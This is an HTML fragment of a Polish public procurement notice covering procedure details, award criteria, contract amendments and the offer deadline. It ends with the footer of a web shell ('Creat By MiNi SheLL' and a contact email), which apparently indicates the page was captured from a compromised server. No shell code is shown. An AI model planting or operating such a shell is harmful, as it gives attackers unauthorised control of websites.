IV.1.5.) Wymaga się złożenia oferty wariantowej: </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_wymaga_zlozenie_oferty_wariantowej">Nie</span> <br/> Dopuszcza się złożenie oferty wariantowej <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej">Nie</span> <br/> Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszcza_zlozenie_oferty_wariantowej_zasadniczej">Nie</span> </div> <br/> <b> IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu </b> <br/> <i> (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne) </i> <div style="padding-left: 20px"> Liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_liczba_wykonawcow"></span> <br/> Przewidywana minimalna liczba wykonawców <span id="ctl00_ContentPlaceHolder1_minimalna_liczba_wykonawcow">0</span> <br/> Maksymalna liczba wykonawców &#160;<span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_wykonawcow">0</span> <br/> Kryteria selekcji wykonawców: <br/> <span id="ctl00_ContentPlaceHolder1_znaczenie_warunkow_wykonawcow"></span> </div> <br/> <b> IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów: </b> <div style="padding-left: 20px"> Umowa ramowa będzie zawarta: <br/> <span id="ctl00_ContentPlaceHolder1_z_kim_umowa_bedzie_zawarta"></span> <br/> Czy przewiduje się ograniczenie liczby uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_czy_ograniczenie_liczby_uczestnikow"></span> <br/> Przewidziana maksymalna liczba uczestników umowy ramowej: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenie_liczby_uczestnikow_informacje_dodatkowe"></span> <br/> Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_obejmuje_ustanowienie">Nie</span> <br/> Adres strony internetowej, na której będą zamieszczone dodatkowe informacje dotyczące dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_obejmuje_ustanowienie_informacje_dodatkowe"></span> <br/> W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych: <br/> <span id="ctl00_ContentPlaceHolder1_czy_umowy_ramowej_dynamicznego_katalogow">Nie</span> <br/> Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów: <br/> <span id="ctl00_ContentPlaceHolder1_czy_pobranie_umowy_ramowej_dynamicznego_katalogow">Nie</span> </div> <br/> <b>IV.1.8) Aukcja elektroniczna </b> <br/> <b> Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i> <span id="ctl00_ContentPlaceHolder1_aukcja_elektroniczna">Nie</span> <br/> Należy podać adres strony internetowej, na której aukcja będzie prowadzona: <br/> <span id="ctl00_ContentPlaceHolder1_adres_strony_na_ktorej_bedzie_prowadzona"></span> <br/> <b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b> <span id="ctl00_ContentPlaceHolder1_elementy_aukcji_elektronicznej"></span> <br/> <b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b> <br/> <span id="ctl00_ContentPlaceHolder1_ograniczenia_do_przedstawianych_wartosci"></span> <br/> Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie termin ich udostępnienia: <span id="ctl00_ContentPlaceHolder1_informaje_udostepnione_wykonawcom"></span> <br/> Informacje dotyczące przebiegu aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_informaje_przebiegu_aukcji"></span> <br/> Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): <span id="ctl00_ContentPlaceHolder1_warunki_do_licytacji"></span> <br/> Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń: <span id="ctl00_ContentPlaceHolder1_wykorzystanie_sprzetu_elektronicznego"></span> <br/> Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: <span id="ctl00_ContentPlaceHolder1_wymagania_dotyczace_rejestracji_wyk_aukcja"></span> <br/> Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa"></span> <br/>Czas trwania: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_jednoetapowa_czas"></span> <br /> <br/> Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_aukcja_wykonawcy_zakwalfikowani"></span> <br/> Warunki zamknięcia aukcji elektronicznej: <br/> <span id="ctl00_ContentPlaceHolder1_warunki_zamkniecia_aukcji"></span> </div> <br/> <b>IV.2) KRYTERIA OCENY OFERT </b> <br/> <b>IV.2.1) Kryteria oceny ofert: </b> <br/> <b>IV.2.2) Kryteria</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kryteria</TD><TD style='border: 1px solid black;border-collapse: collapse;'>Znaczenie</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Cena</TD><TD style='border: 1px solid black;border-collapse: collapse;'>60,00</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Okres gwarancji</TD><TD style='border: 1px solid black;border-collapse: collapse;'>40,00</TD></TR></TABLE> <br/> <b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony) <br/> <span id="ctl00_ContentPlaceHolder1_zastosowanie_procedury_pzp">Tak</span> <br/> <b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b> <br/> <b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b> <br/> Minimalne wymagania, które muszą spełniać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_minimalne_wymagania"></span> <br/> Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziane_jest_zastrzezenie"></span> <br/> Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert: <span id="ctl00_ContentPlaceHolder1_IV_3_1_Przewidziany_podzial"></span> <br/> Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów): <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_etapy_negocjacji"></span> <br/> Informacje dodatkowe <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_1_dodatkowe_informacje"></span> <br/> <br/> <b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b> <br/> Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_opis_potrzeb"></span> <br/> Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_informacja_wysokosc_nagrod"></span> <br/> Wstępny harmonogram postępowania: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_wstepny_harmonogram"></span> <br/> Podział dialogu na etapy w celu ograniczenia liczby rozwiązań: <span id="ctl00_ContentPlaceHolder1_IV_3_2_PodzialDialogu"></span> <br/> Należy podać informacje na temat etapów dialogu: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_EtapyDialogu"></span> <br/> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_2_DodatkoweInformacje"></span> <br/> <b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b> <br/> Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_ElementyOpisu"></span> <br/> Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_PodzialNegocjacji"></span> <br/> Informacje dodatkowe: <br/> <span id="ctl00_ContentPlaceHolder1_IV_3_3_DodatkoweInfo"></span> <br/> <b>IV.4) Licytacja elektroniczna </b> <br/> Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_6"></span> </div> Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_7"></span> </div> Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_8"></span> </div> Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_9"></span> </div> Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa"></span> <span id="ctl00_ContentPlaceHolder1_IV_4_10_licytacja_jednoetapowa_czas"> Czas trwania: </span> <br /> <br/> Wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu: <span id="ctl00_ContentPlaceHolder1_IV_4_10_wykonawcy_zakwalfikowani"></span> </div> Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej: <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_11_data"></span> godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_11_godzina"></span> <br/> Termin otwarcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_12"></span> </div> Termin i warunki zamknięcia licytacji elektronicznej: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_13"></span> </div> <br/> Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_IstotnePostanowienia"></span> </div> <br/> Wymagania dotyczące zabezpieczenia należytego wykonania umowy: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_4_14"></span> </div> <br/> Informacje dodatkowe: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_IV_LicytacjeDodatkoweInformacje"></span> </div> <b>IV.5) ZMIANA UMOWY</b> <br/> <b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy">Tak</span> <br/> Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian: <br/> <span id="ctl00_ContentPlaceHolder1_zmiana_umowy_tekst">W części dotyczącej zmiany wynagrodzenia umownego w przypadku:a) urzędowej zmiany stawki podatku VAT, jeżeli zmiana ta będzie miała wpływ na koszty wykonania zamówienia przez Wykonawcę (przy zachowaniu ceny jednostkowej netto bez zmian).</span> <br/> <b>IV.6) INFORMACJE ADMINISTRACYJNE </b> <br/> <br /> <b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i> <br /> <span id="ctl00_ContentPlaceHolder1_IV_6_1_sposob_udostepniania"></span> <br/> <b>Środki służące ochronie informacji o charakterze poufnym</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_1_srodki_ochrony"></span> <br/> <b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b> <br/> Data: <span id="ctl00_ContentPlaceHolder1_IV_4_4_data">2020-09-14</span>, godzina: <span id="ctl00_ContentPlaceHolder1_IV_4_4_godzina">10:00</span>, <br/> Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem): <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_SkrocenieTerminu">Nie</span> <br/> Wskazać powody: <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_2_Powody"></span> <br/> Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu <br/>> <span id="ctl00_ContentPlaceHolder1_IV_4_4_jezyki"></span> <br/> <b>IV.6.3) Termin związania ofertą: </b> do: <span id="ctl00_ContentPlaceHolder1_IV_4_5_data"></span> okres w dniach: <span id="ctl00_ContentPlaceHolder1_IV_4_5_okres">30</span> (od ostatecznego terminu składania ofert) <br/> <b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków, które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b> <span id="ctl00_ContentPlaceHolder1_IV_4_17">Nie</span> <br/> <b>IV.6.5) Informacje dodatkowe:</b> <br/> <span id="ctl00_ContentPlaceHolder1_IV_6_6"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: center"> <u> ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH </u> </div> <br /> <div> <br /> </div> <br /> <br /> </div> <br /> <br /> <table> <tr> <td> </td> </tr> </table> </div> <script type="text/javascript">//<![CDATA[//]]></script>

Creat By MiNi SheLL
Email: jattceo@gmail.com